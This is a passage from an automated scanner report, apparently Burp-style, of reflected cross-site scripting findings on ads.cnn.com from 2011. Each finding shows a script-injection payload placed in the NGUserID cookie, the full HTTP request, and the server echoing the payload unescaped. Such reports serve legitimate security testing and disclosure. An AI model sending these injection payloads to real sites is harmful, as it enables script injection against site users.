The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50e7"><script>alert(1)</script>d0beb75a10 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1f50e7"><script>alert(1)</script>d0beb75a10; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:54 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:54 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 8021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
586,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59469,60072,60074,60077,60093,60443,60541,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1f50e7"><script>alert(1)</script>d0beb75a10%2CTIL%2C1313434014106&Redirect=http://jobsearch.money.cnn.com/a/all-jobs/list" target="_blank">
...[SNIP]...

1.84. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dc27"><script>alert(1)</script>f60cf4c8ae5 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-16dc27"><script>alert(1)</script>f60cf4c8ae5; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3852
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,59469,60541,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16dc27"><script>alert(1)</script>f60cf4c8ae5%2CTIL%2C1313433990030&Redirect=http://www.facebook.com/cnnmoney">
...[SNIP]...

1.85. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d77"><script>alert(1)</script>4f28e65543b was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-151d77"><script>alert(1)</script>4f28e65543b; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3761
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,60541,60542,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-151d77"><script>alert(1)</script>4f28e65543b%2CTIL%2C1313433990030&Redirect=http://twitter.com/money">
...[SNIP]...

1.86. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 1bc7a<script>alert(1)</script>11ae3b34584 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029234&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-11bc7a<script>alert(1)</script>11ae3b34584; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:15 GMT
Pragma: no-cache
Content-Length: 1474
Content-Type: text/html

callback({ "ad": { "advertiser_text": "E*TRADE","click_url": "http://ad.doubleclick.net/click;h=v2|3D51|0|0|%2a|j;234140391;0-0;0;58074575;31-1|1;39756396|39774183|1;;;pc=[TPAS_ID]%3fhttps://us.etrade
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60663,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-11bc7a<script>alert(1)</script>11ae3b34584%2CTIL%2C1313434014105&amp;random=bgqkjmi,bhesAppdoAnok","third_party_tracking": "http://ad.doubleclick.net/imp;v1;f;234140391;0-0;0;58074575;1|1;39756396|39774183|1;;cs=q;pc=[TPAS_ID];%3fhttp://ad.dou
...[SNIP]...

1.87. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 208aa<script>alert(1)</script>1a5425a7d2f was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029235&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1208aa<script>alert(1)</script>1a5425a7d2f; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:15 GMT
Pragma: no-cache
Content-Length: 1730
Content-Type: text/html

callback({ "ad": { "advertiser_text": "TD Ameritrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d384614%26AdID%3d526236%26TargetID%3d108094%26Segments%3d1869,1880,2244,2743,32
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60664,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1208aa<script>alert(1)</script>1a5425a7d2f%2CTIL%2C1313434014105&amp;random=bfrvpdq,bhesAppdoAnob&amp;Params.tag.transactionid=","third_party_tracking": "http://i.cdn.turner.com/money/images/1.gif"}})

1.88. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 40d5f<script>alert(1)</script>5b6da90c020 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029236&_=1313434043147 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-140d5f<script>alert(1)</script>5b6da90c020; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:17 GMT
Pragma: no-cache
Content-Length: 1706
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Scottrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d351447%26AdID%3d483240%26TargetID%3d108070%26Segments%3d1869,1880,2244,2743,3285,6
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60665,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-140d5f<script>alert(1)</script>5b6da90c020%2CTIL%2C1313434014105&amp;random=eARIok,bhesAprdoAobv","third_party_tracking": "http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1455.876.tk.TEXT/"}})

1.89. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05e1"><script>alert(1)</script>d9fa763ff0e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1e05e1"><script>alert(1)</script>d9fa763ff0e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:40 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:40 GMT
Pragma: no-cache
Content-Length: 3335
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
17,1067,1285,1589,1678,1686,1735,3450,3615,4406,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1e05e1"><script>alert(1)</script>d9fa763ff0e%2CTIL%2C1313434014105&amp;random=bnkhyrb,bhesAmqdozmwz&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1e05e1"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ed9fa763ff0e" width="1"
...[SNIP]...

1.90. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5e05"><script>alert(1)</script>f065f3bcb04 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1b5e05"><script>alert(1)</script>f065f3bcb04; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:30 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:30 GMT
Pragma: no-cache
Content-Length: 3779
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,3615,4407,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1b5e05"><script>alert(1)</script>f065f3bcb04%2CTIL%2C1313434014105&Redirect=http://ad.doubleclick.net/clk;243518150;67034621;x;pc=[TPAS_ID]">
...[SNIP]...

1.91. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bde"><script>alert(1)</script>e6c2b1c7b30 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
